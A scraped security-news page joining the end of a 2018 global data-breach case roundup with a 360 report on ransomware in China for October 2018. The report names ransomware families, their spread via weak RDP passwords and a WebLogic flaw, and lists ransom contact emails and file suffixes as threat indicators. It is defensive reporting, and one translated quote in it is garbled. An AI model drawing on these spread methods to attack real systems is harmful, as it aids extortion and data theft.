2018年5月14日,Kromtech安全中心的研究人员在最近发现,一个归属于俄罗斯视频监控公司iVideon的MongoDB数据库并没有得到保护,并向公众开放。

从数据库的内容来看,它似乎涵盖了iVideon公司的整个用户群,包括其用户和合作伙伴的登录名、电子邮箱地址、密码哈希值、服务器名称、域名、IP地址、子帐户以及软件设置和付款设置信息(并不包括任何信用卡数据)。有超过82万(825388)名用户以及132家合作伙伴受到影响。

(七十六) 神乎其神!北美某赌场因联网鱼缸漏洞被黑,客户信息全泄露

2018年4月17日,据报道,网络安全公司 Darktrace 的首席执行官 Nicole Egan 在上周四于伦敦举办的一次会议上演示了黑客如何通过入侵赌场走廊上水族馆中的联网恒温器黑掉一个名称未被透露的赌场。

黑客利用了恒温器中存在的一个漏洞在网络中站稳脚跟,随后,其设法访问了赌徒中豪掷重金的人的数据库,“然后在网上拉回来拉出恒温器并拉向云。”尽管 Eagan 并未透露这家赌场的身份信息,但她分享的这次安全事件可能发生在去年。当时 Darktrace 公司发布了一份报告,说明了位于北美的一家赌场遭到了这类恒温器攻击。

十一、 医疗卫生
(七十七) MongoDB数据库意外暴露两百多万墨西哥公民的医疗健康数据

2018年8月,据BleepingComputer报道,一个MongoDB数据库被发现可以通过互联网公开访问,其中包含了超过200万(2,373,764)墨西哥公民的医疗健康数据。这些数据包括个人的全名、性别、出生日期、保险信息、残疾状况和家庭住址等信息。

这个数据库是由安全研究员Bob Diachenko通过Shodan发现的,Shodan是一个搜索引擎,可以搜索所有联网设备,而不仅限于Web服务器。当被发现时,这个数据库完全暴露在互联网上,任何人都可以对其访问和编辑,因为它没有设置密码。“MongoDB的安全隐患问题至少从2013年3月开始被人们所知道,从那以后就开始被广泛报道……不安全的数据库仍然大量暴露在互联网上,此类数据库至少有54,000个。”

(七十八) 澳大利亚SA Health医院意外暴露7200名儿童个人资料

2018年8月7日,据报道,澳大利亚SA Health在其官方网站上发布了一篇新闻稿,称旗下位于澳大利亚第五大城市阿德莱德的妇女儿童医院(Womens and Childrens Hospital)因工作人员操作失误,意外暴露了约7200名儿童的医疗记录和个人资料。其中,包括1996年至2005年期间在该医院接受百日咳、胃肠和呼吸道感染治疗的患者的详细资料。

根据SA Health的说法,这些数据早在2005年就已经可以被公众通过互联网访问,直到在上周三有患者的父母在线注意到这些数据后,医院方面才得知了这一事件。这也意味着,这些数据已经在线暴露近13年!

(七十九) 美国医疗保健公司Blue Springs Family Care近4.5万条患者记录遭泄露

2018年7月31日,最近的新闻报道显示,Blue Springs Family Care遭遇了勒索软件攻击,而被落入攻击者手里的数据达到了近4.5(44,979)万条。

在该公司的一封公开信中指出,攻击者可能获得了各种患者记录信息,这至少包括:患者的全名、住址和出生日期、帐号、社会保险号、残疾等级、医疗诊断和驾驶执照/身份证号码。

公开信还透露,2018年5月公司曾遭受勒索软件攻击。Blue Springs Family Care表示,他们已经与另一家电子健康记录提供商达成合作协议,而这个新的合作伙伴会对所有健康数据进行加密保护。

(八十) 美国医疗公司LifeBridge Health泄露近50万患者个人信息

2018年5月22日,根据《巴尔的摩太阳报(Baltimore Sun)》在本周二刊登的一则报道,LifeBridge Health公司日前向近50万位患者发出通知称,他们的个人信息可能会因为网络黑客攻击事件而遭到暴露。

根据LifeBridge Health官方的说法,这一事件最初是在今年3月份被发现的,当时他们在一台服务器上发现了恶意软件,而该服务器被用于为医疗系统的附属医师小组以及共享注册和计费系统提供电子医疗记录数据。

LifeBridge Health通过电子邮件告知患者,根据第三方安全公司的调查结果来看,数据泄露最初开始于2016年9月27日,遭泄露的信息包括患者的姓名、家庭住址、出生日期、保险信息和社会安全号码。

(八十一) 美国医疗转录公司MEDantex意外暴露数千名医生提交的患者记录

2018年4月,KrebsOnSecurity在上周五(4月20日)了解到,MEDantex旗下的一个门户网站存在泄露患者医疗记录的安全隐患。该网站允许医生上传音频文件。这个功能页面原本是应该得到加密保护的,但事实证明任何互联网用户都可以对其进行访问。

MEDantex是一家总部位于美国堪萨斯州的医疗转录公司,它的主要业务即是为医院、诊所和私人医生提供定制的转录解决方案。KrebsOnSecurity表示,他们目前尚不清楚在MEDantex网站上具体有多少患者的医疗记录遭到了暴露,但其中一个被命名为“/ documents / userdoc”的目录包含了与2300多名医生相关的文件。目录以按字母顺序排列,每一个目录中都包含有不同数量的患者医疗记录,其中的Microsoft Word文档和原始音频文件都可以被下载。

(八十二) 挪威过半人口医疗数据疑遭泄漏,攻击者“高阶且专业”

2018年1月19日,挪威当地媒体报道称,负责管理挪威东南部地区医院的机构Health South-East RHF宣布网站遭泄露事件,超过290万用户,超过挪威(总人口520万)一半的人口可能受影响。该组织表示,挪威医疗部门的计算机紧急响应中心HelseCERT 发现来自 HealthSouth-East计算机网络的可疑流量;一名黑客或黑客组织可能已经盗取了上述人口的医疗数据。

Health South-East RHF 和其母公司Sykehuspartner HF 发布联合声明称,“情况严重,并已采取措施限制该事件造成的损害。”Health South-East RHF 将攻击者描述为“高阶且专业”。另外已将该事件通知挪威CERT团队即 NorCERT。

(八十三) 为防止再次发生泄漏事件,新加坡公共医疗领域电脑暂时“断网”

2018年7月23日,新加坡卫生部称,公共医疗机构使用的电脑已暂停接入互联网,防止类似新加坡保健服务集团(新保集团)数据库遭网络攻击事件再度发生。

新加坡公共医疗机构多项服务依靠互联网,切断工作人员所用电脑与互联网的连接可能延长等待时间,给病人带来不便。

据了解,新保集团数据库6月底开始遭网络攻击,大约150万名病人个人资料失窃,新加坡总理李显龙、荣誉国务资政吴作栋及多名部长的个人资料和门诊记录也被窃取,新加坡政府已成立独立调查委员会调查此事。

(八十四) 英国知名药妆店Superdrug近2万名顾客个人信息遭泄露

2018年8月24日,据报道,有黑客在本周一(8月20日)联系了英国知名药妆店Superdrug,称他们已经获得了大约2万名Superdrug顾客的详细个人信息。作为证据,黑客还向Superdrug展示了386名顾客的个人信息记录。

Superdrug号称英国第二大美容和健康零售商,占据英国30%市场份额。经过Superdrug的确认,被窃取的个人信息包括顾客的姓名、住址,以及部分顾客的出生日期、电话和积分余额。不过,Superdrug坚称被黑客窃取的凭证是从入侵第三方得来的,而并非通过入侵Superdrug的系统。之所以能够进一步获取到Superdrug顾客的详细个人信息,这是因为黑客利用了人们有在各种在线服务使用相同密码的习惯。

(八十五) 遭遇网络钓鱼攻击,美国奥古斯塔大学医疗中心泄露41.7万份记录

2018年8月21日,据报道,奥古斯塔大学医疗中心在去年曾遭遇了一次网络钓鱼攻击。最新调查显示这次攻击导致约41.7万份记录遭泄露。遭泄露的数据包含了患者个人信息,以及他们的医疗和健康记录。对于其中一些受害者来说,遭泄露的数据还可能包含财务记录和社会安全号码。

根据该校网站上最新发布的安全通知来看,攻击发生在2017年9月10日至11日。最初,该校认为攻击仅暴露了“少量的内部电子邮件帐户”。然而,在今年,他们意识到约有41.7万份记录因此遭到泄露。

奥古斯塔大学已经准备向每一名受害者发送个人电子邮件,以通知他们有关此次事件,并为社会安全号码遭到泄露的人提供为期一年的免费信用监控服务。

(八十六) 优步270万用户信息被黑客盗取,遭英国监管机构罚款38.5万英镑

2018年11月27日,优步(Uber)近日被英国媒体曝光:旗下约270万英国用户个人信息在2016年被黑客盗取,而最夸张的是优步为了“息事宁人”居然支付了10万美元给黑客,因此被英国监管机构重罚38.5万英镑。

据报道,英国政府Information Commissioner’sOffice(ICO)表示,优步在遭遇黑客攻击后,没有第一时间告知被泄露的用户有关细节,反而支付赎金,这一做法是对用户和优步司机信息安全性的漠视。ICO将这次的黑客行为定义为“严重违法行为”。

目前,ICO正在对案件进行进一步的调查。该办公室还指出,已经在优步的系统中发现了一系列可获得数据的安全漏洞,黑客从一个优步运营的云储存系统中可以下载数以百万计的客户的敏感信息,已掌握了2016年10月和11月被攻击的犯罪事实。

十二、 制造业
(八十七) 巴西最大工业协会被指数据泄露,数千万个人信息可互联网访问

2018年11月,据报道,白帽黑客生态系统Hacken Proof的安全研究员鲍勃·迪亚琴科(Bob Diachenko)称其发现了三个包含个人记录的数据库,可通过Elasticsearch搜索引擎访问这些记录。最大的数据源包含3480万个条目。据迪亚琴科称这些数据已在网上暴露数日。

而被指控泄露上述数据的主体是巴西圣保罗州工业联合会(简称FIESP),FIESP代表了约13万家公司,是巴西工业部门的最大企业实体。这些外泄记录包括:姓名、ID与社会安全号码、完整住址信息以及电子邮件与电话号码。

关于该数据泄露事件,该研究员称其已试图警告FIESP,但无济于事。Hacken Proof在推特上首次公开该泄露事件后,一位巴西粉丝将该数据泄露事件告知了企业,企业这时才离线了数据库。

(八十八) 史上最严重数据车祸:100+车厂机密全曝光,通用丰田特斯拉统统中招

2018年7月22日,据报道,加拿大汽车供应商Level One被UpGuard的研究员Chris Vickery发现,该厂商的数据后门大开,黑客可轻松访问其100多家合作伙伴车厂的机密文件。这100多家车厂,从通用汽车、菲亚特克莱斯勒、福特、丰田,大众到特斯拉,都名列其中。

而被泄露的数据,从车厂发展蓝图规划、工厂原理、制造细节,到客户合同材料、工作计划,再到各种保密协议文件……甚至员工的驾驶证和护照的扫描件等隐私信息,共计157千兆字节,包含近47,000个文件。在反复检查过程中,Chris Vickery确认,通过Level One的文件传输协议rsync,可以无障碍访问上述所有隐私数据。

(八十九) 特斯拉起诉前员工:黑进内部生产系统盗取并泄露机密数据

2018年6月,据美国内华达州联邦法庭公布的诉讼文件显示,特斯拉起诉了一名该州TeslaGigafactory超级工厂的一名前员工马丁·特里普(Martin Tripp),称其盗取了该公司的商业机密并向第三方泄露了大量公司内部数据。

据诉讼文件显示,该名员工承认曾开发恶意软件进入特斯拉内部生产操作系统,偷取大量数据并交给第三方,还向媒体发表不实言论。这些被泄露的数据包括“数十份有关特斯拉的生产制造系统的机密照片和视频”。

特里普开发的恶意软件安装在了三台不同员工的电脑上,所以在他离开特斯拉后,还能继续从该公司传输数据到第三方。而电脑被安装该恶意软件的员工也将受到牵连。

十三、 其他
(九十) 国泰航空940万名乘客个人数据被盗,包含出行地点数据

2018年10月25日,据外媒报道,大型国际航空公司国泰航空披露,在今年3月发生的一次数据泄露事件中,该公司的940万名乘客的记录被盗,另外含有姓名、出生日期、住址等个人信息的护照信息也可能已经泄露。据悉,此次事件还涉及到了每位乘客的具体出行地点以及客户服务代表的评论等等。

另外,国泰航空还指出,有403个过期信用卡卡号、27个没有CVV号码的信用卡卡号遭到访问。但是,没有密码遭到泄露。

这家公司选择在6个月后公布数据泄露事件的做法也许会在欧洲市场遇到阻碍,因为那边最新通过的通用数据保护条例要求公司在发现违规情况三天后就要告知客户和执法部门。

(九十一) 丽笙酒店集团遭遇数据泄露,官方称受影响会员不足10%

2018年11月2日,据英国The Register报道,丽笙酒店集团(Radisson hotel Group,以下简称“丽笙”)已经于10月30日开始向参与其奖励计划的会员发出电子邮件,确认了一起黑客攻击。丽笙在其声明中没有提到黑客侵入了哪个系统,也没有提供其他技术细节。其发言人表示,此次事件只影响不足10%的丽笙奖励计划会员账户。

丽笙在其发出的电子邮件中表示,此次数据事件并不涉及任何信用卡或密码信息,目前已经被确认能够被黑客访问的信息仅限于会员的姓名、住址(包括居住国)、电子邮箱地址,以及一部分会员的公司名称、电话号码、丽笙奖励计划会员编号等信息等。

(九十二) 开发者安全预警:数万Jenkins暴露在网上,已发现大量敏感数据

2018年1月23日,研究人员表示,没有利用任何漏洞,就在互联网上发现了暴露2.5万个Jenkins实例,从这些实例中发现了不少大型公司泄露了敏感证书和日志文件,这都可能会引发数据泄露事件。

Jenkins是最受欢迎的开源自动化服务器,由CloudBees和Jenkins社区维护。 自动化服务器支持开发人员构建,测试和部署其应用程序,在全球拥有超过133,000个活跃安装实例,用户超过100万。

上述2.5万个实例中,10-20%的实例存在配置错误,这些错误配置的实例,大多也都泄露了敏感信息,包括专用源代码库的证书,部署环境的证书(例如用户名、密码、私钥和AWS令牌)以及包括凭证和其他信息的作业日志文件敏感数据。

(九十三) 澳大利亚国家绝密文件被卖二手店

2018年2月1日,澳大利亚政府的某人决定卖掉两个尘封已久的文件柜卖掉,因为他们丢掉了文件柜钥匙;随后买家用一把电钻打开了柜——连续五届政府在储藏柜放着的文件。

最终,这些文件辗转到达澳大利亚广播公司 (ABC) 的手中,这家媒体目前正在发布他们认为安全的资料。ABC 披露的文档中包括Rudd 政府如何计划资助澳大利亚已引发争议的国家宽带网络 (NBN) 的机密简讯。该公司播报人员表示“不会发布涉及国家安全、或者信息已公开、或涉及公务员的隐私的文档”。

(九十四) 3500万美国选民记录黑客论坛有售

2018年10月24日,美国11月中期选举临近,AnomaliLabs 和 Intel 471 的研究人员发现某黑客论坛上竟然在售卖3500万条美国选民的记录,牌出售的选民记录来自美国19个州的2018选民登记,包括威斯康辛、得克萨斯和佐治亚州。据称该选民数据记录包含全名、电话号码、住址、选举历史和其他未明确的选举数据。

号称有600万选民的威斯康辛州,选民记录价格为1.25万美元。其他州的选民信息报价在几千美元,到几百美元不等。卖家承诺,每周都会在从州政府线人处收到信息时更新选民登记数据。令人匪夷所思的是,售卖信息刚贴出来几小时后,论坛上就出现了众筹购买该选民记录的活动。

(九十五) Google Groups配置不当,一大波财富500强公司敏感信息遭泄露

2018年6月,Kenna Security 公司研究员指出,由于Google Group配置出错,导致数千家组织机构的某些敏感信息被泄露。这些受影响组织机构包括财富500强公司、医院、高等院校、报纸和电视台以及美国政府机构等。根据样本统计,约31%的 GoogleGroups会导致泄露数据。

独立研究员 Brain Krebs 上周五发布分析结果表示,“除了泄露个人信息和金融数据外,配置错误的 GoogleGroups 账户有时候还公开检索关于组织机构本身的大量信息,包括员工使用手册链接、人员配备计划、宕机和应用 bug 报告以及其他内部资源。

研究人员指出,“鉴于这种信息的敏感特征,可能会引发鱼叉式钓鱼攻击、账户接管和多种特定案例的欺诈和滥用情况。”

(九十六) MongoDB可公开访问,美国慈善机构Kars4Kids泄露上万名捐赠者个人信息

2018年11月3日,网络安全咨询公司Hacken的网络风险研究主管BobDiachenko发现了一个似乎是可公开访问的MongoDB数据库。经过进一步调查,这些数据似乎包含了21,612名Kars4Kids捐赠者的电子邮箱地址和其他个人信息,以及超级管理员用户名和密码。

Kars4Kids是一家成立于1994年的慈善机构,总部设在美国新泽西州莱克伍德,将其大部分收益都捐赠给了Oorah,一个以解决“犹太儿童及其家庭的教育、物质、情感和精神需求”为目标的国家组织。

据分析,有网络犯罪分子可能已经使用这些用户名和密码访问了Kars4Kids仪表板的内部帐户,这将使得他们能够访问更敏感的数据。例如,度假券(向捐赠者提供的免费假期)和收据,以及包括电子邮箱地址、家庭住址和电话号码等在内的个人信息。

(九十七) MongoDB配置不当,近70万美国运通印度分公司客户联系信息遭泄露

2018年11月,据外媒ZDNet报道,近70万名美国运通(Amex)印度分公司客户的个人详细信息在最近被一名安全研究人员发现通过一台存在配置错误的MongoDB服务器暴露在了网上。

大约在三个星期以前,国际网络安全咨询公司Hacken的网络风险研究主管Bob Diachenko发现了这台漏洞百出的服务器。该服务器不仅能够被公开访问,而且没有设置密码。

据研究员表示,这些以明文形式存储的记录包含了美国运通印度分公司客户的个人详细信息,如电话号码、全名、电子邮箱地址和支付卡类型等。虽然这些数据似乎并不过于敏感,但很可能会对垃圾电子邮件活动起到推动作用。

(九十八) MongoDB数据库配置不当,数万Bezop代币用户个人信息泄露

2018年4月,据报道,网络安全公司Kromtech偶然发现了一个未加密的MongoDB数据库,其中包含了超过25,000名Bezop用户的详细个人信息,其中一部分是6,500名Bezop(BEZ)加密货币的投资者,剩余部分则单单只是Bezop代币的接收者。

安全研究人员称,这个向公众开放的数据库包含了姓名、家庭住址、电子邮箱地址、加密密码、钱包信息以及护照、驾驶执照或身份证的扫描件等敏感信息。

数据库所存储的这些信息与Bezop团队在年初开始运行的“ 赏金计划 ” 有关。在此期间,该团队将Bezop代币分发了给在其社交媒体帐户上推广该货币的用户。

(九十九) 半年186家!日企机密文件大量被“晒”百度文库

2018年3月,据调查企业信息泄露情况的相关公司的统计,最近半年多时间,186家日企的文件被发布到文档分享网站上。这可能导致专利信息的泄露等,专家呼吁日本企业加强内部管理。

发布日本企业内部文件的是中国百度运营的文档分享网站“百度文库”。日本IT相关公司“CROSSWARP”调查显示,仅2017年6月~2018年2月期间,上述近200家日企的文件被发布到百度文库上。这些资料上均标有注意字样,意味着属于“机密”文件。

熟悉中国法律的律师分部悠介表示,在中国泄露企业营业机密也属于违法行为,不过只有受害金额较大等情况下才会适用刑事处罚。另外,由于要证明网上的投稿使企业蒙受严重损失十分困难,因此很难通过刑事处罚来遏制这种行为。

(百) 美国大数据营销公司因失误泄露2TB隐私信息,涉2.3亿人

2018年6月28日,据Wired报道,本月初曝光的市场和数据汇总公司Exactis服务器信息暴露的事情经调查为实。Exactis此次的信息泄露并不是黑客撞库引起或者其它恶意攻击,而是他们自己的服务器没有防火墙加密,直接暴露在公共的数据库查找范围内。

据了解,Exactis采集了大约3.4亿条记录,大小2TB,可能涵盖2.3亿人,几乎是全美的上网人口。虽然上述信息中不包含信用卡号、社会保障号码等敏感的金融信息,但是隐私深度却超乎想象,包括一个人是否吸烟,他们的宗教信仰,他们是否养狗或养猫,以及各种兴趣,如潜水和大码服装,这几乎可以帮助构建一个人的几乎完整“社会肖像”。

(百一) 咨询公司Rice Consulting云泄露大量敏感数据:曾为美国民主党筹款432万美元

2018年10月30日,Hacken网络风险研究主管BobDiachenko在本月17日通过Shodan搜索引擎发现了一台因配置错误而公开暴露在互联网上的BuffaloTeraStation NAS网络附加存储器,所有者是总部位于美国马里兰州的Rice Consulting咨询公司。

根据Rice Consulting官方网站所展示的信息来看,该公司曾在2017年与美国民主党合作(Democratic Party US),为其筹集资金超过432万美元。NAS包含了有关Rice Consulting过去数千次筹款活动的详细信息,如姓名、电话号码、电子邮箱地址、地址、公司、合同、会议记录、桌面备份、员工详细信息等。

Diachenko表示,他在NAS上发现的“最重要的资产”是NGP的用户名和密码组合。但遗憾的是,所有这些用户名和密码都被存储在一个没有设置密码的Excel文件中。

本文转载自: 360威胁情报中心
如若转载,请注明出处: https://mp.weixin.qq.com/s?timestamp=1547619833&src=3&ver=1&signature=uRwEXeQejyKzota10YMLCyKcoIuYkv-rjDzhVIEVkQ*d4uF0kMW-odNJ*Im72*Cops4NvK8uSKHW4W8pqqRxgplg68gnSKdgjkzqZ0ES9nEKcbEuPCgMEaywo5XV-sz4-e0*00Ia*2YAHgHgIXcH7NMuSDkeoJ8ctQRSwKu3bVQ=
安全客 – 有思想的安全新媒体
安全资讯 数据泄露

360威胁情报中心 认证 分享到: QQ空间 新浪微博 微信 QQ facebook twitter
|推荐阅读

事件分析 | Linux watchdogs 感染性隐藏挖矿病毒入侵还原录
2019-02-23 19:55:32

WordPress 5.0 RCE 详细分析
2019-02-22 16:45:18

某php开源cms有趣的二次注入
2019-02-22 16:30:08

三层网络靶场搭建&MSF内网渗透
2019-02-22 14:30:46
|发表评论
发表你的评论吧
昵称
大表姐
换一个
|评论列表
还没有评论呢,快去抢个沙发吧~
360威胁情报中心
这个人太懒了,签名都懒得写一个
文章
87
粉丝
27
TA的文章
盲眼鹰(APT-C-36):持续针对哥伦比亚政企机构的攻击活动揭露
2019-02-19 14:33:15
1月政企终端安全态势分析报告
2019-02-18 15:19:45
疑似Molerats APT组织针对中东地区的最新攻击活动分析
2019-02-15 10:38:53
2018年全球十大APT攻击事件盘点
2019-02-08 10:07:13
全球高级持续性威胁2018年总结报告
2019-02-06 10:47:02
输入关键字搜索内容
相关文章
2月23日每日安全热点 – 18年成人网站出售账户信息广告增长一倍
从RSA 2019创新沙盒“十强”看网络安全技术动向
2月22日每日安全热点 – Adobe再次为Reader推送补丁以防止重要信息的泄露
2月21日每日安全热点 – WinRAR中存在19年的代码执行漏洞
GitHub上发布后即登顶的老司机渗透教程,你的小本本备好了吗?
“高价收购私人微信号”的局中局
2月20日每日安全热点 – 社工妹子跟踪狂
热门推荐
文章目录
国内机构重大数据泄露案例
一、 内部威胁
二、 外部威胁
国外各行业信息泄露案例
一、 IT信息企业
二、 政府机构
三、 电信运营商
四、 互联网
五、 交通物流
六、 教育
七、 金融
九、 生活服务
十、 物联网
十一、 医疗卫生
十二、 制造业
十三、 其他
安全客Logo
安全客
安全客
关于我们
加入我们
联系我们
用户协议
商务合作
合作内容
联系方式
友情链接
内容须知
投稿须知
转载须知
合作单位
安全客
安全客
Copyright ? 360网络攻防实验室 All Rights Reserved 京ICP备08010314号-66
Loading…0daybank

国内勒索病毒疫情

首页
文章

漏洞
SRC导航
内容精选

输入关键词搜索

APP 登录| 注册
2018年10月国内勒索病毒疫情分析
阅读量 131226 | 评论 8

分享到: QQ空间 新浪微博 微信 QQ facebook twitter
发布时间:2018-11-07 14:28:32

随着勒索病毒的广泛传播,给企业和个人的数据带来严重的威胁,360互联网安全中心针对勒索病毒进行了多方位的监控与防御。从本月的反馈数据来看,勒索病毒的传播量总体呈下降趋势,而由于系统存在漏洞导致被感染的用户占比,则在本月有所上涨。

感染数据分析
通过对本月勒索病毒的感染数据进行统计分析,10月相对于9月反馈数量有小幅度下降。10月份整体反馈下降的主要原因是受弱口令爆破影响被感染的系统数量减少,但针对存在此类风险的环境(例如开启远程桌面功能,使用共享文件夹,mssql数据库服务,Tomcat等),仍应重视弱口令攻击问题。

图1. 2018年反馈数量统计

通过对360防护数据中心监控的数据分析进行,在10月22号有一次小规模的勒索病毒爆发。此次小规模的爆发的主要是由GandCrab勒索病毒传播引起,最主要传播途径是口令爆破。

图2. 10月份勒索病毒感染趋势

分析10月份勒索病毒家族分布情况,GandCrab家族超越了之前占据榜首的Crysis家族和GlobeImposter家族,成为传播量最大的一个家族。分析了其部分原因:

GandCrab病毒在暗网中进行售卖,使用分成模式,购买该勒索病毒的群体比较多。
该勒索病毒制造者,还创建维护了一个GandCrab病毒传播者社区,招募病毒传播者,并提供技术支持。使用门槛上要比另外几大勒索病毒低。
GandCrab勒索病毒引发的新闻事件最近较多,影响范围扩大(例如本月被广泛播报的新闻——叙利亚一位父亲在twitter上发布帮助请求,自己已逝儿子留下的照片被GandCrab勒索病毒加密事件),这也在一定范围内提升了其 “知名度”,而其中不乏有所图谋的不法分子。

图3. 10月勒索病毒反馈分布

被感染系统中,Windows7系统仍是占比最大。

图4. 10月被感染系统统计

通过对9月份和10月份被感染系统进行对比分析:发现在10月份中,被感染的服务器占比继续上升。近几个月,服务器的感染量占比逐月上升,不仅是因为服务器被攻击的价值更大,还因为服务器上部署的服务更多,暴露面更大,对服务器的攻击一直居高不下。

图5. 9月与10月被感染系统对比图

勒索病毒最新情报
如前文所述,本月Crysis家族和GlobeImposter家族的传播量在本月都有下降,但从使用的版本来看,两个家族都还在对病毒进行不断的更新,因此对于弱口令的防护仍旧需要提高重视。本月Crysis新增后缀XXXX和BETTA;GlobeImposter家族新增后缀Help4444和Crypted_bizarrio@pay4me_in。

家族 Crysis家族 GlobeImposter家族
后缀 COMBO Dragon4444
GAMMA Snake4444
BIP Horse4444
BGTX Rooster4444
XXXX Help4444
BETTA ALCO
– ROCK
– crypted_bizarrio@pay4me_in
– ZYX

{MOLLYGREENS@PROTONMAIL4.COM}MG

表1. Crysis家族,GlobeImposter家族本月使用后缀

在本月,通过RDP传播的GandCrab勒索病毒在10月22号达到了高峰,而利用漏洞进行传播的GandCrab勒索病毒则是在10月25号达到的最高峰。

图6. GandCrab勒索病毒家族本月传播趋势

在10月25日达到传播量顶峰的主要原因是该勒索病毒之前的版本已被成功破解,勒索病毒制造者也在这天发布了新版本的勒索病毒。感染之前版本GandCrab的用户可以通过“360解密大师”进行解密,支持包括GandCrab V5.0.3在内的之前的所有版本。

图7. 解密被GandCrab加密的文件

在处理用户求助中,发现仍旧有用户是因为下载破解软件导致机器被勒索。在此再次提醒广大用户,如果下载的破解软件被杀毒软件提示病毒并查杀,一定不要冒险运行,其中很有可能含有病毒木马。下图就是GandCrab勒索病毒的下载页面,下载回来的程序会加密你的文件,且最新版本的GandCrab勒索病毒目前无法破解。

图8. GandCrab勒索病毒常见诱导下载页面

此外,根据360防护中心监控到的数据发现:Satan勒索病毒已更新到V4.2版本,在最新版本中新增加了利用CVE-2018-2894(WebLogic任意文件上传漏洞)进行传播。

图9. CVE-2018-2894漏洞利用

从数据上看,Satan是从本月10月15日开始爆发,并在10月27号当天传播量达到最高峰的。360安全研究人员对最新版本的Satan样本进行分析发现——该勒索病毒的加密手段可以被破解,并在10月22号发布了Satan V4.2版本的解密工具。

图10. Satan勒索病毒传播趋势

本月我们还监控到了一款新的勒索病毒——sicck。该勒索病毒会向用户索要1个比特来解密文件,但它的勒索提示信息在生成上存在一定问题——只有在管理员权限下运行,才能成功生成勒索提示信息。

图11. sicck勒索病毒提示信息

在对sicck勒索病毒分析时发现,在加密用户系统内文件时需要跳过一些文件夹不进行加密,这其中包含360相关的文件夹,该勒索病毒很有可能是一个国产的勒索病毒。

图12. sicck勒索病毒分析

黑客信息
以下是10月份以来黑客在使用的勒索病毒联系邮箱

crypted_bizarrio@pay4me_in

MOLLYGREENS@PROTONMAIL1.COM

onionhelp@memeware.net

sicck@protonmail.com

crypted_marztoneb@tutanota_de

uncrypte@india.com

Help_Files@aol.com

makaylabz10owilson@aol.com

GoldenYogi@protonmail.com

supportfiless24@protonmail2.ch

eight1.hundred

johnstang@zoho.eu

MOLLYGREENS@PROTONMAIL4.COM

supplng@protonmail.com

johnsmith987654@tutanota.com

fyffe.c@aol.com

bhurda@aol.com

kts2018@protonmail.com

bitsupportx@protonmail.com

judnickrengasami@aol.com

Darknes@420blaze.it

stopencrypt@qq.com

jumanji07@cock.li

helpersmasters@xmpp.jp

supports@cock.li

WriteToUs@firemail.cc

yourhope@airmail.cc

buydecrypt@qq.com

lybot@keemail.me

kurosaki_ichigo@tutanota.com

lebron@nuke.africa

nobad@tutamail.com

Suzumiya_Haruhi@tutanota.com

backtonormal@foxmail.com

paydecryption@qq.com

decoder-help@protonmail.com

decrypt@fros.cc

techn@airmail1.cc

helpersmasters@airmail.cc

helponlinesupport@airmail1.cc

vsokaitis@aol.com

minotaur0428blaze.it

broodmother@cock.li

heinonenfornoff@aol.com

garrantydecrypt@airmail.cc

bitpandacom@qq.com

bitencrypt@cock.li

cyrill.fedor0v@yandex.com

claymore@airmail.cc

raclawtravier@aol.com

altdelete@cock.li.district

unlock@cock.li

travolta_john@aol4.com

bakfiles@protonmail.com

travolta_john@aol2.com

fastsupport@airmail1.cc

decriptscrabber@mail.ru

Helip@protonmail.com

crypted_okumura@firemail

trinskert@bk.ru

travolta_john@aol1.com

heinonenfornoff@aol.com

ctrlalt@cock.li

catherwood.judd@aol.com

files.recovery@foxmail.com

nikolatesla@cock.li

SabinaSciubba@protonmail.com

deasonpennapati@aol.com

zero@hook.work

eadmundcoutts@aol.com

brbrcodes@gmail.com

syndicateXXX@aol.com

footballprom@tuta.io

badbusiness@tutanota.de

GetDataBack@fros.cc

yourway@cock.li

garrantydecrypt@airmail.cc

old@nuke.africa

asdqwezxc@cock.li

BM-2cWdhn4f5UyMvruDBGs5bK77NsCFALMJkR@bitmessage.ch

rsupp@protonmail.ch

表2. 黑客邮箱

防护数据
从被攻击系统分布图看,被攻击的服务器系统版本中Windows server 2003占比最高,其次是Windows 2008,再是Windows server 2012。建议用户不要在使用停止支持的操作系统,更新到新版操作系统,能够提供更好的安全保护。

图13. 10月被攻击系统分布

以下是根据10月份被攻击IP采样制作的被攻击地域分布图,和之前几个月采集到的进行对比,地区的排名和占比差别都不大。信息产业发达的地区仍是被攻击的主要对象。

图14. 10月被攻击地区分布图

通过10月份和9月份的弱口令攻击趋势对比可以发现,针对RDP进行攻击的量在上升:在9月份最高一天攻击次数为400多万次,在10月份最高一天为600多万近700万次。而针对mysql进行攻击量有明显降低:在9月份最高一天有近2000万次,在10月份最高的一天只有100多万次。

图15. 攻击类型趋势图

总结
针对服务器的勒索病毒攻击已经成为当下勒索病毒的一个主要方向,企业也需要将强自身的信息安全管理能力,尤其是弱口令,漏洞,文件共享和远程桌面的管理,以应对勒索病毒的威胁,再次我们给各位管理员一些建议:

多台机器,不要使用相同的账号和口令,口令要有足够的长度和复杂性,并定期更换登录口令;
重要资料应设置访问权限控制,并做好备份工作;
关闭非必要的服务与端口,定期检测系统和软件中的安全更新,及时打上补丁;
服务器应安装专业安全防护软件,定期检查服务器安全运行情况(包括账户情况,windows日志,安全软件日志),在发现异常后第一时间进行处理。
本文由安全客原创发布
转载,请参考转载声明,注明出处: https://www.anquanke.com/post/id/163745
安全客 – 有思想的安全新媒体
恶意软件 勒索软件 安全报告

360安全卫士 认证 分享到: QQ空间 新浪微博 微信 QQ facebook twitter
|推荐阅读

事件分析 | Linux watchdogs 感染性隐藏挖矿病毒入侵还原录
2019-02-23 19:55:32

WordPress 5.0 RCE 详细分析
2019-02-22 16:45:18

某php开源cms有趣的二次注入
2019-02-22 16:30:08

三层网络靶场搭建&MSF内网渗透
2019-02-22 14:30:46
|发表评论
发表你的评论吧
昵称
吃瓜群众
换一个
|评论列表
仓鼠 · 2018-11-24 17:54:17 回复
主要以邮件、程序木马、网页挂马的形式进行传播。该病毒性质恶劣、危害极大,一旦感染将给用户带来无法估量的损失。勒索病毒及其变种的频繁出现,也严重威胁到普通用户的上网安全。从去年到今年,勒索病毒不断地在变种,目的只有一个,钱财。不法黑客通过文件加密或屏幕锁定的方式要求中招者支付一定数额的赎金,其中文件加密是最为普遍的勒索方式。不法黑客往往利用RSA、AES等加密算法对文件进行加密,除非拿到对应的密钥,否则难以通过第三方自行解密。在日常使用中,企业管理人员需要具备很强的安全意识。大佬们都提到了弱口令,出现的原因就是安全意识差。使用恰当的安全软件,保护电脑不再受勒索,是明智的。

The Flash · 2018-11-11 19:15:36 回复
